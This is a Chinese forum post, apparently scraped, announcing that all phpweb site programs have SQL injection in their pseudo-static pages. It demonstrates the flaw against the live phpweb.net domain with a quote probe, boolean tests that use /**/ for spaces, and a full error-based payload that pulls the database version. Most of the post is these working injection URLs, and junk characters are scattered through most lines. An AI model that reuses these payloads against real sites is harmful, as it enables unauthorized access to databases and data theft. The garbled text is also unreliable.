phpweb所有的整站程序伪静态页面都存在sql注入5 { m, G8 N% j) K( E: W
7 i) B# G# k- C8 V
主站:http://phpweb.net/* Y. T. W6 `' w
加’检测:
0 X; a0 B, f0 M
( Y. W7 f: p. \, x$ K' _# {( lhttp://www.phpweb.net/down/html/?772′.html) i$ E4 L% Z* _# t: ]" G/ e
) h! x6 X0 H/ x
出错 }; `. p; K3 w" k/ k- ?7 G
存在注入。) @7 \: {* ]9 o
不能用空格,只能用/*罗
2 X9 s6 F6 H4 p" S5 ehttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
! W6 T( Y, p g4 A9 O
6 t y# {, g; E) i/ Chttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.( l: K" p# W: W: h
爆数据库版本:
7 `5 [# @) E1 B) | ; a ^6 D3 Z" A9 y% W' w, B: b' Q
?# C3 o$ a) c5 e7 I# ^
1
9 t2 N4 x, j3 M/ zhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html: y: _. S/ \5 c, T, i% P
更新日期: 2013-01-03 13:39:50
; Z) ~" }- I. m! y2 c |
发表于 2013-1-4 19:46:42
收藏
支持
反对